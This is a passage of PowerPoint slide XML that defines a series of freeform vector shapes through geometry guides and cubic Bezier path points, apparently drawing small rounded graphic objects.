                      <a:pt x="36" y="8"/>
                      <a:pt x="19" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="53"/>
                      <a:pt x="0" y="80"/>
                      <a:pt x="16" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="103"/>
                      <a:pt x="57" y="94"/>
                      <a:pt x="74" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="50"/>
                      <a:pt x="92" y="23"/>
                      <a:pt x="77" y="11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8" name="Freeform 14539"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5729" y="2786"/>
                <a:ext cx="357" cy="353"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 14 h 90"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 77 h 90"/>
                  <a:gd name="T16" fmla="*/ 75 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="75" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="8"/>
                      <a:pt x="43" y="0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1" y="90"/>
                      <a:pt x="41" y="90"/>
                      <a:pt x="41" y="90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2" y="80"/>
                      <a:pt x="75" y="79"/>
                      <a:pt x="77" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="67"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="75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9" name="Freeform 14540"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5663" y="2814"/>
                <a:ext cx="311" cy="351"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 79 h 89"/>
                  <a:gd name="T2" fmla="*/ 15 w 79"/>
                  <a:gd name="T3" fmla="*/ 62 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 26 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 7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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="79"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="89"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="15" y="62"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="43"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="48" y="7"/>
                      <a:pt x="63" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="46"/>
                      <a:pt x="79" y="69"/>
                      <a:pt x="66" y="79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0" name="Freeform 14541"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5772" y="2940"/>
                <a:ext cx="88" cy="100"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 22"/>
                  <a:gd name="T1" fmla="*/ 22 h 25"/>
                  <a:gd name="T2" fmla="*/ 5 w 22"/>
                  <a:gd name="T3" fmla="*/ 17 h 25"/>
                  <a:gd name="T4" fmla="*/ 4 w 22"/>
                  <a:gd name="T5" fmla="*/ 3 h 25"/>
                  <a:gd name="T6" fmla="*/ 18 w 22"/>
                  <a:gd name="T7" fmla="*/ 8 h 25"/>
                  <a:gd name="T8" fmla="*/ 18 w 22"/>
                  <a:gd name="T9" fmla="*/ 2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25"/>
                  <a:gd name="T17" fmla="*/ 22 w 22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25">
                    <a:moveTo>
                      <a:pt x="18" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="25"/>
                      <a:pt x="9" y="23"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="0" y="6"/>
                      <a:pt x="4" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="18" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="13"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="18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1" name="Freeform 14542"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5800" y="2971"/>
                <a:ext cx="32" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 8"/>
                  <a:gd name="T1" fmla="*/ 8 h 9"/>
                  <a:gd name="T2" fmla="*/ 2 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 9"/>
                  <a:gd name="T4" fmla="*/ 2 w 8"/>
                  <a:gd name="T5" fmla="*/ 1 h 9"/>
                  <a:gd name="T6" fmla="*/ 6 w 8"/>
                  <a:gd name="T7" fmla="*/ 3 h 9"/>
                  <a:gd name="T8" fmla="*/ 7 w 8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9"/>
                  <a:gd name="T17" fmla="*/ 8 w 8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9">
                    <a:moveTo>
                      <a:pt x="7" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="9"/>
                      <a:pt x="3" y="8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8" y="5"/>
                      <a:pt x="8" y="7"/>
                      <a:pt x="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2" name="Freeform 14543"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5763" y="2868"/>
                <a:ext cx="97" cy="140"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 1 w 24"/>
                  <a:gd name="T3" fmla="*/ 30 h 35"/>
                  <a:gd name="T4" fmla="*/ 9 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 35"/>
                  <a:gd name="T6" fmla="*/ 19 w 24"/>
                  <a:gd name="T7" fmla="*/ 33 h 35"/>
                  <a:gd name="T8" fmla="*/ 24 w 24"/>
                  <a:gd name="T9" fmla="*/ 4 h 35"/>
                  <a:gd name="T10" fmla="*/ 6 w 24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35"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 35 h 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35">
                    <a:moveTo>
                      <a:pt x="6" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="30"/>
                      <a:pt x="1" y="30"/>
                      <a:pt x="1" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="31"/>
                      <a:pt x="4" y="33"/>
                      <a:pt x="9" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="35"/>
                      <a:pt x="19" y="34"/>
                      <a:pt x="19" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="4"/>
                      <a:pt x="24" y="4"/>
                      <a:pt x="24" y="4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3" name="Freeform 14544"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5769" y="2763"/>
                <a:ext cx="131" cy="125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 32"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 24 h 32"/>
                  <a:gd name="T4" fmla="*/ 14 w 33"/>
                  <a:gd name="T5" fmla="*/ 30 h 32"/>
                  <a:gd name="T6" fmla="*/ 29 w 33"/>
                  <a:gd name="T7" fmla="*/ 29 h 32"/>
                  <a:gd name="T8" fmla="*/ 33 w 33"/>
                  <a:gd name="T9" fmla="*/ 5 h 32"/>
                  <a:gd name="T10" fmla="*/ 5 w 33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3"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 33 w 33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3" h="32">
                    <a:moveTo>
                      <a:pt x="5" y="0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0" y="26"/>
                      <a:pt x="6" y="29"/>
                      <a:pt x="14" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="32"/>
                      <a:pt x="28" y="31"/>
                      <a:pt x="29" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33" y="5"/>
                      <a:pt x="33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4" name="Freeform 14545"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5521" y="2843"/>
                <a:ext cx="354" cy="354"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 78 h 90"/>
                  <a:gd name="T16" fmla="*/ 74 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="74" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="8"/>
                      <a:pt x="42" y="0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1" y="90"/>
                      <a:pt x="41" y="90"/>
                      <a:pt x="41" y="90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2" y="81"/>
                      <a:pt x="75" y="79"/>
                      <a:pt x="77" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="74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5" name="Freeform 14546"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5449" y="2868"/>
                <a:ext cx="311" cy="351"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 66 w 79"/>
                  <a:gd name="T1" fmla="*/ 80 h 89"/>
                  <a:gd name="T2" fmla="*/ 16 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 89"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 89"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 89"/>
                  <a:gd name="T8" fmla="*/ 66 w 79"/>
                  <a:gd name="T9" fmla="*/ 8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89"/>
                  <a:gd name="T17" fmla="*/ 79 w 79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89">
                    <a:moveTo>
                      <a:pt x="66" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="89"/>
                      <a:pt x="31" y="82"/>
                      <a:pt x="16" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="49" y="8"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="66" y="80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6" name="Freeform 14547"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5564" y="3000"/>
                <a:ext cx="82" cy="94"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 21"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 4 w 21"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 21"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 17 w 21"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 21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24"/>
                  <a:gd name="T17" fmla="*/ 21 w 21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24">
                    <a:moveTo>
                      <a:pt x="18" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="24"/>
                      <a:pt x="8" y="22"/>
                      <a:pt x="4" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="17" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="12"/>
                      <a:pt x="21" y="19"/>
                      <a:pt x="18" y="2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7" name="Freeform 14548"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5592" y="3031"/>
                <a:ext cx="29" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 7"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 1 w 7"/>
                  <a:gd name="T3" fmla="*/ 5 h 8"/>
                  <a:gd name="T4" fmla="*/ 1 w 7"/>
                  <a:gd name="T5" fmla="*/ 0 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 7"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 6 w 7"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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8">
                    <a:moveTo>
                      <a:pt x="6" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="7"/>
                      <a:pt x="1" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="4"/>
                      <a:pt x="0" y="1"/>
                      <a:pt x="1" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="6" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="4"/>
                      <a:pt x="7" y="6"/>
                      <a:pt x="6" y="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8" name="Freeform 14549"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6066" y="2868"/>
                <a:ext cx="354" cy="357"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 90"/>
                  <a:gd name="T1" fmla="*/ 25 h 90"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 6 h 90"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 6 h 90"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 15 h 90"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 90 h 90"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 82 h 90"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 82 h 90"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 78 h 90"/>
                  <a:gd name="T16" fmla="*/ 75 w 90"/>
                  <a:gd name="T17" fmla="*/ 25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90"/>
                  <a:gd name="T29" fmla="*/ 90 w 90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90">
                    <a:moveTo>
                      <a:pt x="75" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="8"/>
                      <a:pt x="43" y="0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1" y="90"/>
                      <a:pt x="41" y="90"/>
                      <a:pt x="41" y="90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72" y="81"/>
                      <a:pt x="75" y="80"/>
                      <a:pt x="77" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="68"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="75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9" name="Freeform 14550"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5997" y="2897"/>
                <a:ext cx="311" cy="357"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 65 w 79"/>
                  <a:gd name="T1" fmla="*/ 80 h 90"/>
                  <a:gd name="T2" fmla="*/ 15 w 79"/>
                  <a:gd name="T3" fmla="*/ 63 h 90"/>
                  <a:gd name="T4" fmla="*/ 13 w 79"/>
                  <a:gd name="T5" fmla="*/ 10 h 90"/>
                  <a:gd name="T6" fmla="*/ 63 w 79"/>
                  <a:gd name="T7" fmla="*/ 27 h 90"/>
                  <a:gd name="T8" fmla="*/ 65 w 79"/>
                  <a:gd name="T9" fmla="*/ 8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90"/>
                  <a:gd name="T17" fmla="*/ 79 w 79"/>
                  <a:gd name="T18" fmla="*/ 90 h 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90">
                    <a:moveTo>
                      <a:pt x="65" y="80"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="90"/>
                      <a:pt x="30" y="82"/>
                      <a:pt x="15" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="44"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="13" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="0"/>
                      <a:pt x="48" y="8"/>
                      <a:pt x="63" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="46"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="65" y="80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0" name="Freeform 14551"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6108" y="3028"/>
                <a:ext cx="86" cy="94"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 22"/>
                  <a:gd name="T1" fmla="*/ 21 h 24"/>
                  <a:gd name="T2" fmla="*/ 5 w 22"/>
                  <a:gd name="T3" fmla="*/ 17 h 24"/>
                  <a:gd name="T4" fmla="*/ 4 w 22"/>
                  <a:gd name="T5" fmla="*/ 2 h 24"/>
                  <a:gd name="T6" fmla="*/ 17 w 22"/>
                  <a:gd name="T7" fmla="*/ 7 h 24"/>
                  <a:gd name="T8" fmla="*/ 18 w 22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24"/>
                  <a:gd name="T17" fmla="*/ 22 w 22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24">
                    <a:moveTo>
                      <a:pt x="18" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="24"/>
                      <a:pt x="9" y="22"/>
                      <a:pt x="5" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="12"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="4" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="0"/>
                      <a:pt x="14" y="2"/>
                      <a:pt x="17" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="12"/>
                      <a:pt x="22" y="19"/>
                      <a:pt x="18" y="2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1" name="Freeform 14552"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6134" y="3060"/>
                <a:ext cx="32" cy="31"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 8"/>
                  <a:gd name="T1" fmla="*/ 7 h 8"/>
                  <a:gd name="T2" fmla="*/ 2 w 8"/>
                  <a:gd name="T3" fmla="*/ 6 h 8"/>
                  <a:gd name="T4" fmla="*/ 2 w 8"/>
                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 6 w 8"/>
                  <a:gd name="T7" fmla="*/ 2 h 8"/>
                  <a:gd name="T8" fmla="*/ 7 w 8"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 8 w 8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8">
                    <a:moveTo>
                      <a:pt x="7" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="8"/>
                      <a:pt x="3" y="7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8" y="4"/>
                      <a:pt x="8" y="6"/>
                      <a:pt x="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2" name="Freeform 14553"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6086" y="2940"/>
                <a:ext cx="91" cy="134"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 24"/>
                  <a:gd name="T1" fmla="*/ 3 h 34"/>
                  <a:gd name="T2" fmla="*/ 5 w 24"/>
                  <a:gd name="T3" fmla="*/ 33 h 34"/>
                  <a:gd name="T4" fmla="*/ 15 w 24"/>
                  <a:gd name="T5" fmla="*/ 34 h 34"/>
                  <a:gd name="T6" fmla="*/ 24 w 24"/>
                  <a:gd name="T7" fmla="*/ 29 h 34"/>
                  <a:gd name="T8" fmla="*/ 19 w 24"/>
                  <a:gd name="T9" fmla="*/ 0 h 34"/>
                  <a:gd name="T10" fmla="*/ 0 w 24"/>
                  <a:gd name="T11" fmla="*/ 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34"/>
                  <a:gd name="T20" fmla="*/ 24 w 24"/>
                  <a:gd name="T21" fmla="*/ 34 h 3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34">
                    <a:moveTo>
                      <a:pt x="0" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="33"/>
                      <a:pt x="5" y="33"/>
                      <a:pt x="5" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="34"/>
                      <a:pt x="10" y="34"/>
                      <a:pt x="15" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="33"/>
                      <a:pt x="24" y="31"/>
                      <a:pt x="24" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="0"/>
                      <a:pt x="19" y="0"/>
                      <a:pt x="19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3" name="Freeform 14554"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6049" y="2834"/>
                <a:ext cx="128" cy="126"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 5 h 32"/>
                  <a:gd name="T2" fmla="*/ 4 w 33"/>
                  <a:gd name="T3" fmla="*/ 29 h 32"/>
                  <a:gd name="T4" fmla="*/ 19 w 33"/>
                  <a:gd name="T5" fmla="*/ 30 h 32"/>
                  <a:gd name="T6" fmla="*/ 32 w 33"/>
                  <a:gd name="T7" fmla="*/ 24 h 32"/>
                  <a:gd name="T8" fmla="*/ 28 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 5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3"/>
                  <a:gd name="T19" fmla="*/ 0 h 32"/>
                  <a:gd name="T20" fmla="*/ 33 w 33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3" h="32">
                    <a:moveTo>
                      <a:pt x="0" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="29"/>
                      <a:pt x="4" y="29"/>
                      <a:pt x="4" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="31"/>
                      <a:pt x="11" y="32"/>
                      <a:pt x="19" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="29"/>
                      <a:pt x="33" y="26"/>
                      <a:pt x="32" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="28" y="0"/>
                      <a:pt x="28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4" name="Freeform 14555"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5857" y="2928"/>
                <a:ext cx="354" cy="351"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 74 w 90"/>
                  <a:gd name="T1" fmla="*/ 24 h 89"/>
                  <a:gd name="T2" fmla="*/ 29 w 90"/>
                  <a:gd name="T3" fmla="*/ 5 h 89"/>
                  <a:gd name="T4" fmla="*/ 29 w 90"/>
                  <a:gd name="T5" fmla="*/ 5 h 89"/>
                  <a:gd name="T6" fmla="*/ 0 w 90"/>
                  <a:gd name="T7" fmla="*/ 14 h 89"/>
                  <a:gd name="T8" fmla="*/ 41 w 90"/>
                  <a:gd name="T9" fmla="*/ 89 h 89"/>
                  <a:gd name="T10" fmla="*/ 69 w 90"/>
                  <a:gd name="T11" fmla="*/ 81 h 89"/>
                  <a:gd name="T12" fmla="*/ 69 w 90"/>
                  <a:gd name="T13" fmla="*/ 81 h 89"/>
                  <a:gd name="T14" fmla="*/ 77 w 90"/>
                  <a:gd name="T15" fmla="*/ 77 h 89"/>
                  <a:gd name="T16" fmla="*/ 74 w 90"/>
                  <a:gd name="T17" fmla="*/ 24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89"/>
                  <a:gd name="T29" fmla="*/ 90 w 90"/>
                  <a:gd name="T30" fmla="*/ 89 h 8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89">
                    <a:moveTo>
                      <a:pt x="74" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="7"/>
                      <a:pt x="42" y="0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1" y="89"/>
                      <a:pt x="41" y="89"/>
                      <a:pt x="41" y="89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2" y="80"/>
                      <a:pt x="75" y="79"/>
                      <a:pt x="77" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="67"/>
                      <a:pt x="89" y="44"/>
                      <a:pt x="74" y="2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5" name="Freeform 14556"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="5783" y="2954"/>
